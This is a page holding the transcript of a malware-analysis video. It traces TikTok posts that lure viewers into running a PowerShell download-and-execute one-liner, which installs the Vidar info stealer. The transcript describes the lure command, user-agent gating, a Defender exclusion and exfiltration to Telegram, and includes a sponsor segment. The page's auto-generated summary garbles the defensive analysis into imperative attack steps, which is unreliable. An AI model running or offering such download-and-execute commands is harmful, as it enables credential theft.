REPORT THIS ACCOUNT

John Hammond · Beginner ·🔐 Cybersecurity ·1y ago

Key Takeaways

The video analyzes a TikTok account posting fake instructions to install cracked software, which is actually malware, and demonstrates how to use tools like Powershell, curl.exe, and Keeper Security to manage privileged access and protect against cybersecurity threats.

Full Transcript

to get chat GPT pro client with new O3 model on Windows press Windows button plus r type Powershell and run it in the Powershell window type this command and press enter wait a few moments for the installation process to complete well that's got to be malware this Tik Tok account called the shell Shield has repeatedly been posting videos and clips to install cracked software for things like chat GPT Office 365 cap cut Adobe Premiere Photoshop and all these different things but they're all lies and these videos have like thousands of views some of them have over a 100,000 views what they're telling you to do when you press the Windows key and r on your keyboard to open up the Run dialogue box lets you run a command like Powershell and you open up and you enter iwr that's an alias for invoke web request to download contents from the internet when you pipe it to IEX another Powershell Alias for invoke expression you're executing and running arbitrary code on your computer you don't know what it's actually doing and in this case it's installing malware let me show you I'm inside of my windows 11 virtual machine and if I were to open up the Run dialogue box with that hotkey windows and r on my keyboard if I were to open up Powershell I'll full screen this and make the text a little bit bigger so you can see if I type in IW that's trying to run the commandlet invoke web request to download something from the internet so so let's try to go to one of those URLs in a web browser like Firefox say we went to that website they reference in the video like chat gp. ke to.cc navigating to this in our web browser actually tells us it's 403 Forbidden because the server is making sure that you request this via the Powershell command it's actually checking your user agent or the client that you use to connect to the website and this iwr as I mentioned is an alas in Powershell we can see all the others with get alias and there are tons of these but iwr stands for invoke web request and that I that it's piped to with that vertical bar character means invoke expression that is the Detonator that's what's going to trigger and invoke the code that you just pulled down from an untrusted location let's try and run that command without piping it to I iwr chat GPT as an example. key to.cc you can take a look at the out put here it is a Powershell object so we'd have to drill down to actually see the real content but it returns an HTTP status code of 200 not the 403 Forbidden we just saw within Firefox so here's the magic trick behind the scenes the website is really looking for Powershell in your user agent so let's use a different program to be able to retrieve the contents of the website I'll use curl. exe and the .exe is important here because curl on it it own is another Alias and Powershell for invoke web request but curl. EXE the actual binary is still included within windows so I'll use Tac Capital H to specify a header and I'll include my user agent without even being like a full natural and real string for a user agent let's just say Powershell and then let's grab that same URL chat GPT key to.cc now we get a lot more output we see the real content that it returns and it is code that will be executed on your system but what does this code actually do let's try and make some sense of it this is all Powershell syntax and let's put it in a text editor so we could actually explore I like to use Sublime Text but you can of course use whatever you'd prefer if I set the syntax here to Powershell we've got some nice syntax highlighting but take a look all the words that are denoted with a dollar sign prefix are variables in Powershell and it's putting together some interesting data and all these variables that are base 64 encoded or a different representation that it will decode later on you can see this down below with the from base 64 string commands all making changes to the variables defined above then you can see it creates a hidden folder by joining together an environment variable for your local app data based off of a new random guid or unique identifier it creates this as a directory and then creates an exclusion in your anti virus Windows Defender now this usually requires admin privileges but malware authors and hackers and cyber criminals like to think if you're running this on your laptop or your own personal computer you probably are a local admin of that device then you can see it download something else based off those variables that invoke web request full command it makes the newly created hidden folder actually hidden via the file system attributes adds the exclusion and then then starts a whole new process or a new program running on your computer if anything errors or goes wrong in this try and catch block it will exit but if not it'll just say and lie to you an error occurred during activation please try and run it again so now that we have a little bit more context as to what this is really doing and where the detonators are well all these variables and the decoding base 64 is probably fine for us to explore and interrogate let me copy these and I'll actually run these so we can evaluate and see what these values are decoded within Powershell back at our prompt I'll honestly just paste these in and let them all evaluate then I want to Echo or display these values out so I know what they really are to make this easy I'm actually going to grab all of these lines uh and put them in a new buffer within Sublime Text so then I'll use contr a to select everything control shift L to create multiple cursors and I'll actually just grab from the very end of the line removing all the stuff to have it decoded but then I'll add an echo at the beginning so I can just easily see the values as I paste that into my terminal take a look now all of these values are readable they're decoded from that encoded b64 format you can see the download URL here is actually at this website Roc cellular.com filth that thing. EXE a little bit of behind the scenes it looks like that Powershell code has just been recently changed because just a bit ago while I was trying to go through this it actually pointed to aol.com which if you go to that website it's seemingly some fake I don't know real or legitimate maybe compromised website to look like some company offering some services but again it's just serving malware here is some of the info while I was looking through that testing with Spotify key to.cc really any subdomain or whatever application or program you supply doesn't even have to be a real thing sp. whatever or even no subdomain or program provided at all key to.cc would return all the same content and when we actually got to decode these this would return that aol.com files sl.exe I've actually received two different emails about this from two different folks so thank you so much for keeping me aware and and big thanks to the folks that uploaded the sample or the actual executable to hybrid analysis or shared the hash so we could track it down on other services like virus total so now I've gotten that main.exe the program in payload downloaded and we can start to take a look at it and see what it really does but before we do please let me take a quick second to tell you about the sponsor of today's video keeper security managing privileged access is one of the toughest challenges in cyber security today every organization even my own needs a way to seamlessly secure and manage access to critical resources like credentials servers web apps databases and workloads but it's tough with today's environments that have both Legacy platforms and modern Cloud infrastructure that is where keeper Pam comes in I've had the chance to try it myself and I got to say it's impressive the platform is intuitive powerful and fit seamlessly into any Tech stack keeper Pam gives you complete visibility security and control over every user and device in your organization whether you're working across multicloud environments on Prem systems or remote workloads keeper Pam has you covered with features like passwordless access to all infrastructure even machines that don't natively support it just in time access so you can grant Tim limited access to resources without exposing credentials automatic password rotation you can just set it and forget it for ultimate peace of mind and protection of service accounts and even session recording you can track activity across SSH RDP database connections and more whether it's managing privilege sessions tunneling into SSH clients and database management tools or securing multicloud environments keeper Pam just works and when it comes to security it's got everything you're looking for and more they're fed ramp and state ramp authorized ISO certified zero trust zero knowledge and the list keeps on going so if you're ready to secure your users data and infrastructure check out keeper Pam today with my link below in the video description jh. life/ keeper dpam huge thanks to keeper for sponsoring this video all right now first things first let's try and see what this main.exe really is with the tool detect it easy I'll go ahead and open up and I'll navigate to open up our main.exe with that loaded it looks like oh this is a goang program compiled with the programming language go now you might use whatever reverse engineering tool you might like if you're trying to take a look at the disassembly or make some sense of the operations of this program whether you're using gidra whether you're using binary ninja personally I found that Ida seems to do the best job of looking at goang programs so I have Ida installed and we can open that up and I'll select our main.exe I'm okay to let it do whatever it will do I believe it should be able to analyze it just fine and make some sense of the the goang symbols function names or at least a little bit more sense than just the randomly named things Ida will take a little bit of time to cruise through this but it does a pretty good job of tracking down functions that are pertinent to the main application or the program you're really looking at and then all the other packages or libraries that might be things that the goang language could Import in or use like btes fmt for format strings buffo things that you're used to in the goang programming l language goang has a couple different idiosyncrasies when you're trying to take a look at it in a disassembler like this I believe maincore main will take us to the main function and we can try to make sense of this but often times the runtime Mor stack knock txt will sort of bring us right back to where we started at the beginning of the function call and this seems to be pretty common throughout all the other functions we look at in go if I press F5 and just sort of trust hey can the decompiler make some sense of this well the main function apparently just Loops forever and sleeps for an ungodly amount of time so maincore main isn't all that it could do here maincore init I think will just as easily get called we could double click on this and try to make some sense of it Ida might stumble here and there and I'll admit I am not the sharpest uh when it comes to disassembling goang code and even within Ida everything that I've tried to find has either been a little outdated or just not super duper modern so please in the comments let me know give me that feedback what I could do to get a little bit smarter looking at go code here uh I know that it's not using null terminated strings like C would be so all the other things that it might try to make sense of are going to look like a very very long syntax string with that it's kind of hard to make sense of each and everything that it does here but you can see everything that for functions that it might load from other dlls and win32 API functions like you saw probably all the lazy dll and lazy proc loading that is the norm for working with that in goang hey pulling up ntdll.dll maybe getting some functions like virtual Alec virtual protect stuff to mess with memory etc etc but I'm not extremely clear where this goes when we have main init uncore 0 and then Funk 3core 4 etc etc we could keep clicking into each of these and trying to make some sense of them and then maybe finding where calls presumably obfuscated functions like this ztz l y JM whatever and then others for XL RP IQ blah blah blah but I'm going to be brutally honest I have not been able to trace it clicking through these you see kind of a similar structure for each maybe a couple of them will eventually call those other Strang named functions but I'm going to assume runtime new proc whenever we find it we'll execute another process or maybe a whole another binary that's extracting out we could see a lot of the other libraries that it uses like crypto so maybe it's safe to assume there is some encrypted data in here that it'll just carve out of itself looking at a couple of the other functions maybe you could see exactly that crypto AES new Cipher new GCM with nons and tag size and then eventually maybe it invokes it calls it uh static analysis for go I'm going to struggle not going to lie clicking around we can see some interesting stuff like trying to walk or move through different directories like seeon back/ Windows to navigate and look through the rest of your file system but putting together the logic and structure of this to know what happens when is just tough so I will opt for dynamic analysis and try to just run this malware and see what it does well we could totally try to make some sense of this while using tools from CIS internals like procmon or process Monitor and try to Trace different API calls and let it detonate I really don't want to do that even inside of my own virtual machine because you never know and in this case we'll kind of take the high road let's use an online sandbox like any run where we could just upload this and try to see it in action I like to upload the entire zip archive where we could have gotten this from and then put it on the desktop so that I can extract it manually that's the benefit of the interactive sandbox here I'll set the operating system to Windows 11 give us a little bit more time and then let's just try and run it once any run has this all stag let me go ahead and extract this out to the desktop we can just put it there and I'll enter the password usually for all malare samples that is infected you can see the password infected as I've typed it in we'll click okay now that that's created let me simply rename that to add the exe extension at the end and I'll double click on this to let it run you can see the process started way over on the right hand side and any run is tracking a couple different things just kind of natural default boilerplate Microsoft Shenanigans but while this fires up maybe it'll start to do something interesting oh okay looks like it is going to query the registry and let me move my face out of the way here there is functionality for communication over UDP Network okay some Yara signatures that are tracking that application based on goang cool it can track that already uh obviously nothing happening on the screen but oh what is that uh it spawned a child process bit Locker to go oh and it's tracking Bad News Bears with that one uh vdar stealer oh it even got the config out of it okay and then a lot of Microsoft Edge processes being spawned uh CPO stting to pin up I don't know what that might be doing but but bit Locker to go that it just dumped is clearly bad vdar stealer vdar is an info stealer as there are many of them you might know of Redline or raccoon stealer plenty of others that will try to track down other information on your computer to grab passwords to grab cookies things that are saved as you navigate to different web pages on the vdar mutex has been found I think that's the most definitive thing found the name approve April one of the signatures Left Behind from that malware strain or that family uh it's still running this process but it has not finished yet although any run is certainly saying this is not good steals credentials from web browsers and you can see a lot of the uh information that it pulls here it's trying to read out of Opera in this case one of the web browsers uh we could take a look at some others looks like Thunderbird maybe some email clients potential things for moonchild Productions I'm not sure about that one actions of stealing personal data we could see it probably tracking down Google Chrome Google Chrome user data like the local state maybe cookies passwords present there default past history previous things that you've been navigating to and browsing through with your web pages and this is the norm right this is for every single possible web browser it'll try to extract the credentials the passwords your autofill data Maybe the save credentials addresses Bank information or stuff like credit cards you use to make purchases online it's going to steal all this information bundle it up and then try to forward it to maybe some external resource so the hacker the Cyber criminal here and the fraudster scammer what is it Shield shell or shell Shield Tik Tok account could now use this for whatever Badness they want to do even functionality for taking screenshots that was tracked down with some signatures from Yara I don't think anyone will give us a lot of good detail on that yeah uh just where it could be in the binary enumerating installed software process Communications with telegram possibly using it as an attacker C2 oh this was mentioned in the email that we got I wonder if we could track down the URL a little bit more information might be available as we Explore More in any run but did bit Locker to go finish okay yeah that process has ended let's explore some of the other things uh obviously bit Locker to go is what's going to be making all these HTTP requests uh that's the suspicious one going to I don't know what flag that is I'm not cultured for the rest of the world does it go to telegram let's see what in the connections tab bit Locker to go oh yeah there is the t.me telegram messenger can we see the traffic there what is it uploading or where is it going to not a lot visible we can assume a lot of this will be encrypted right we saw some of the capability even if it was in the original Stager before it got to this bit Locker to go binary then goes to webd disk. lat. org sketch and Ms Edge called over and over again keeps going to weird places but I'm not positive why uh if any of you have Insight again please don't hesitate give me that feedback I'd love to be schooled let me know in the comments part of me thinks like cryptocurrency mining but I don't want to say with any certainty making a lot of communication to this 8889924573 stuff there that must be another location where it's probably exfiltrating a lot of the data that it just stole oh and goodness you probably couldn't even see that IP address cuz my stupid face is in the way anyone said it could track down the config though right the CFG button does that give me any cool Insight oh C2 be the telegram user B4 cha 0000 oo let me take a look at that one and a URL for a steam Community profile oh B4 Chow 00 that's our bad actor here uh and there's the link like okay telling us now webd disk. lat. org you can see probably a pipe used as the delimiter there but is this page real uh okay returning a 404 it's probably going to be receiving the information uh and capturing it there but this o m05 I believe is a like campaign ID for this Vidar Steeler instance correct and anyone had a steam profile like is it storing the locations of where to exfiltrate out to with either a telegram account information or a steam profile information obviously malware can do that right but yeah whoa take a look exact same campaign ID o main 05 and then a different IP address uh does that correspond to that web load rat thing but that's not the 88 IP address we saw in any run so I'm curious what all these kind of are let me check census 65109 that's the one that we saw from the steam profile that is in Finland okay and the HTTP redirects to Wikipedia nice but that's just the homepage I'm sure probably the end points that it would end up working with are going to be pointing it towards whatever it will do to retrieve the info how about our webis lat. org yeah yeah yeah okay that's the 8889924573 back inside of any run and the dynamic sandbox can we take a closer look at more of the things that this does uh we could obviously kind of explore all the stuff that it's doing for info stealing but I don't know if all that'll be too interesting it had a certificate with bit Locker to go that is a like is that a natural location in Windows oh yeah bit Locker to go. exe there but did they do some process injection with that to spawn it and then put malware in it right because obviously we saw like the virtual Alec the protect Shenanigans it very well could have because this is a Microsoft CT uh process dump included a couple things here the modified files are interesting a lot of uh Microsoft cache things and a Json text that's actually something we could explore but these are all the things with Microsoft Edge right putting up on that Port 9223 uh I again would love your input because this is something that I'm not super certain of what are the they doing here and why that does not seem pertinent to info stealing but look at all the stuff that they drop here C program data uas ZZ uh and they do this over and over and over again for different files at the end of all the processes that uh fired uh after Ms Edge we did see cmd.exe run and if I double click or if I actually explore this the main information tells me that they ran cmd.exe with a timeout of 10 seconds to delay some execution as anyone notes and then Rd to remove directory uh based off of okay uas ZZ the exact same like subdirectory that we're seeing they're staging all the other stuff from bit Locker to go the modified files puts it all there and what are these binaries they are sqlite databases very much likely the browser information because your web browser Google Chrome or Firefox or whatever stores a lot of those in like local sqlite databases connections tab though we certainly see that telegram call uh and then everything else that it might be doing with that external C2 or at least the place where it's exfil trating this all out to 888991253 over in Germany with all that said you are not installing a cracked software for chat GPT or access to Office 365 or cap cut or the full active install of Windows or Adobe Premiere or adobe acromat or Adobe Photoshop it is an info stealer it is Vidar info stealer and it is malware that you are putting on your computer to steal your passwords your credentials cookies sessions anything so please your goodness report this user report account frauds and scams I mean is that even right is there a section for like encouraging the download and distribution of malware posting inappropriate content uh misinformation whatever the heck as long as you do it as long as this account gets taken down and those domains and anything we can track down as part of the attack chain here it's Bad News Bears don't fall for this anything that tells you to open up the uh run dialogue box paste in Powershell code that you don't know what it does don't do it let me take one last look right rather than having this be executed with the pipe to IEX or invoke expression if we curl down the contents we can see that Rogue Powershell we can see the base 64 data that we could decode to get to that main.exe serve on that a solver.com now keeping it easy literally just using cyberchef yeah there is that now I believe they put it back to that other one but trying to download it is it alive it's still alive still hosted file contains a virus or malware thank you big thanks to the folks that had shared this with me I wish I could have had a little bit more leite cool sophisticated stuff looking through goang and ripping it up in Ida or gidra or binary ninja but honestly sometimes look you get faster answers with dynamic IC analysis and it's worth still taking a look and having the understanding what you are running and executing on your computer with all that said thank you so much for watching hope you enjoyed this video please do all those YouTube algorithm things like comment subscribe and please do give some love to our sponsors Link in the video description I'll see you in the next video

Original Description

https://jh.live/keeper-pam || Keeper PAM offers a privileged access management solution for enterprise grade protection all in one unified platform -- keep your users, data, and environment secure with Keeper! https://jh.live/keeper-pam Learn Cybersecurity and more with Just Hacking Training: https://jh.live/training See what else I'm up to with: https://jh.live/newsletter 🏆Attend ContinuumCon, the practical online cybersecurity conference that never ends! Livestream begins June 20th, 2025: https://jh.live/continuumcon Learn Coding: https://jh.live/codecrafters Host your own VPN: https://jh.live/openvpn WATCH MORE: Dark Web & Cybercrime Investigations: https://www.youtube.com/watch?v=_GD5mPN_URM&list=PL1H1sBF1VAKVmjZZr162aUNCt2Uy5ozAG&index=4 Malware & Hacker Tradecraft: https://www.youtube.com/watch?v=LKR8cdfKeGw&list=PL1H1sBF1VAKWMn_3QPddayIypbbITTGZv&index=5 📧JOIN THE NEWSLETTER ➡ https://jh.live/newsletter 🙏SUPPORT THE CHANNEL ➡ https://jh.live/patreon 🤝 SPONSOR THE CHANNEL ➡ https://jh.live/sponsor 🌎FOLLOW ALONG ➡ https://jh.live/twitter ↔ https://jh.live/linkedin ↔ https://jh.live/discord ↔ https://jh.live/instagram ↔ https://jh.live/tiktok 💥 SEND ME MALWARE ➡ https://jh.live/malware 🔥YOUTUBE ALGORITHM ➡ Like, Comment, & Subscribe!
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from John Hammond · John Hammond · 0 of 60

← Previous Next →
1 Code Commentaries? PHP to JavaScript in Bash and PHP!
Code Commentaries? PHP to JavaScript in Bash and PHP!
John Hammond
2 Tutorials? MySQL connection with PHP and Bash!
Tutorials? MySQL connection with PHP and Bash!
John Hammond
3 Variable Naming in Python! Happy Birthday, Linux! Nokia N900!
Variable Naming in Python! Happy Birthday, Linux! Nokia N900!
John Hammond
4 JavaScript Splits The URL!
JavaScript Splits The URL!
John Hammond
5 HTML Tables in Python!
HTML Tables in Python!
John Hammond
6 HTML, Net Shares, GML!
HTML, Net Shares, GML!
John Hammond
7 Python 08 Programming Style and Comments
Python 08 Programming Style and Comments
John Hammond
8 Python 26 Object Oriented Programming
Python 26 Object Oriented Programming
John Hammond
9 75 Python Tutorials, Out Now!
75 Python Tutorials, Out Now!
John Hammond
10 Batch 14 Mathematical Expressions
Batch 14 Mathematical Expressions
John Hammond
11 Batch 85 Array Append
Batch 85 Array Append
John Hammond
12 Batch 86 Array Count
Batch 86 Array Count
John Hammond
13 Batch 87 Array Index
Batch 87 Array Index
John Hammond
14 Batch 88 Array Insert
Batch 88 Array Insert
John Hammond
15 Batch 89 Array Remove
Batch 89 Array Remove
John Hammond
16 Batch 90 Array Reverse
Batch 90 Array Reverse
John Hammond
17 Python [colorama] 00 Installing on Linux
Python [colorama] 00 Installing on Linux
John Hammond
18 Python [colorama] 09 Cursor Position
Python [colorama] 09 Cursor Position
John Hammond
19 Python [hashlib] 02 Algorithms
Python [hashlib] 02 Algorithms
John Hammond
20 Python 00 Installing IDLE on Linux
Python 00 Installing IDLE on Linux
John Hammond
21 Python [pygame] 11 Rectangular Collision Detection
Python [pygame] 11 Rectangular Collision Detection
John Hammond
22 Python [pygame] 12 Platforming Rectangular Collision Resolution
Python [pygame] 12 Platforming Rectangular Collision Resolution
John Hammond
23 Python [XML-RPC] 01 Research
Python [XML-RPC] 01 Research
John Hammond
24 Python [pyenchant] 03 Personal Word Lists
Python [pyenchant] 03 Personal Word Lists
John Hammond
25 FancyURLopener Authentication and User-Agent [urllib] 03
FancyURLopener Authentication and User-Agent [urllib] 03
John Hammond
26 Python 04: PEP8 Coding
Python 04: PEP8 Coding
John Hammond
27 Python Challenge! 17 COOKIES
Python Challenge! 17 COOKIES
John Hammond
28 Google CTF 2016: Ernst Echidna
Google CTF 2016: Ernst Echidna
John Hammond
29 Google CTF 2016: Spotted Quoll
Google CTF 2016: Spotted Quoll
John Hammond
30 Google CTF 2016: Can you Repo It?
Google CTF 2016: Can you Repo It?
John Hammond
31 Google CTF 2016: No Big Deal
Google CTF 2016: No Big Deal
John Hammond
32 Google CTF 2016: In Recorded Conversation
Google CTF 2016: In Recorded Conversation
John Hammond
33 Homemade CTF Challenge: 01 "Orchestra"
Homemade CTF Challenge: 01 "Orchestra"
John Hammond
34 Homemade CTF Challenge: 02 "Bae's Base"
Homemade CTF Challenge: 02 "Bae's Base"
John Hammond
35 Homemade CTF Challenge: 03 "Web Hunt"
Homemade CTF Challenge: 03 "Web Hunt"
John Hammond
36 Homemade CTF Challenge: 04 "UPX"
Homemade CTF Challenge: 04 "UPX"
John Hammond
37 Homemade CTF Challenge: 05 "The Assumption Song"
Homemade CTF Challenge: 05 "The Assumption Song"
John Hammond
38 Homemade CTF Challenge: 06 "A Brisk Stroll"
Homemade CTF Challenge: 06 "A Brisk Stroll"
John Hammond
39 Homemade CTF Challenge: 06 "I lost my password!"
Homemade CTF Challenge: 06 "I lost my password!"
John Hammond
40 web25 :: Mr. Robot : EKOPARTY CTF 2016
web25 :: Mr. Robot : EKOPARTY CTF 2016
John Hammond
41 web50 : RFC 7230 :: EKOPARTY CTF 2016
web50 : RFC 7230 :: EKOPARTY CTF 2016
John Hammond
42 misc50 : Hidden inside EKO :: EKOPARTY CTF 2016
misc50 : Hidden inside EKO :: EKOPARTY CTF 2016
John Hammond
43 Hack The Vote 2016 CTF: Sander's Fan Club [web100]
Hack The Vote 2016 CTF: Sander's Fan Club [web100]
John Hammond
44 Hack The Vote 2016 CTF Warpspeed [forensics150]
Hack The Vote 2016 CTF Warpspeed [forensics150]
John Hammond
45 Juniors CTF 2016 :: Black Suprematic Square
Juniors CTF 2016 :: Black Suprematic Square
John Hammond
46 Juniors CTF 2016 :: Six Strange Tales
Juniors CTF 2016 :: Six Strange Tales
John Hammond
47 Juniors CTF 2016 :: Lost Code
Juniors CTF 2016 :: Lost Code
John Hammond
48 Juniors CTF 2016 :: Here Goes!
Juniors CTF 2016 :: Here Goes!
John Hammond
49 Juniors CTF 2016 :: Southern Cross
Juniors CTF 2016 :: Southern Cross
John Hammond
50 Juniors CTF 2016 :: Clone Attack
Juniors CTF 2016 :: Clone Attack
John Hammond
51 Juniors CTF 2016 :: Dirty Repo
Juniors CTF 2016 :: Dirty Repo
John Hammond
52 Juniors CTF 2016 :: Hackers Blog
Juniors CTF 2016 :: Hackers Blog
John Hammond
53 Juniors CTF 2016 :: Voting!!!
Juniors CTF 2016 :: Voting!!!
John Hammond
54 Juniors CTF 2016 :: The Good, The Bad and The Junkman
Juniors CTF 2016 :: The Good, The Bad and The Junkman
John Hammond
55 Juniors CTF 2016 :: Stop Thief!
Juniors CTF 2016 :: Stop Thief!
John Hammond
56 Juniors CTF 2016 :: ROFL
Juniors CTF 2016 :: ROFL
John Hammond
57 Juniors CTF 2016 :: Restriced Area
Juniors CTF 2016 :: Restriced Area
John Hammond
58 Juniors CTF 2016 :: Oh SSH!
Juniors CTF 2016 :: Oh SSH!
John Hammond
59 HackCon CTF 2017 TRIVIA and BONUS Challenges
HackCon CTF 2017 TRIVIA and BONUS Challenges
John Hammond
60 HackCon CTF 2017 "Bacche" Challenges
HackCon CTF 2017 "Bacche" Challenges
John Hammond

The video teaches how to analyze and protect against malware and cybersecurity threats using various tools and techniques, including Powershell, Keeper Security, and Yara signatures. It demonstrates how to use these tools to manage privileged access, track malware, and identify potential C2 communication.

Key Takeaways
  1. Run Powershell command to download and execute code from the internet
  2. Use curl.exe to bypass the website's user agent check and retrieve the contents of the website
  3. Decode base 64 encoded variables to create a hidden folder on the user's computer
  4. Use Keeper Security to manage privileged access and protect against cybersecurity threats
  5. Analyze network activity using Yara signatures and track HTTP requests
  6. Identify potential C2 communication with Telegram
  7. Use process injection to spawn malware
  8. Exfiltrate data to a specified IP address
💡 The video highlights the importance of using privileged access management tools like Keeper Security to protect against cybersecurity threats and demonstrates how to use various tools and techniques to analyze and track malware.

Related Reads

📰
Critical phpBB Authentication Bypass Allows Instant Account Takeover
Learn about a critical phpBB authentication bypass vulnerability that allows instant account takeover and how to patch it
Dev.to · BeyondMachines
📰
How to Use Snort on Ubuntu Dedicated Servers to Detect SSH Brute-Force Attacks
Learn to detect SSH brute-force attacks on Ubuntu servers using Snort, a powerful network intrusion detection system
Dev.to · Nyra Amsi
📰
Cloudflare's Flexible SSL looks secure. It isn't.
Cloudflare's Flexible SSL may display a padlock, but it doesn't necessarily mean the site is secure, and here's why and how to fix it
Dev.to · Boris Kl
📰
Password Spray Attacks: How Attackers Exploit Authentication Weaknesses
Learn how password spray attacks exploit authentication weaknesses and how to protect against them
Dev.to · GuardingPearSoftware
Up next
BYC Ventures’ partnership with cybersecurity company CeQureX is intended to provide dedicated specia
BitPinas - Crypto News Philippines
Watch →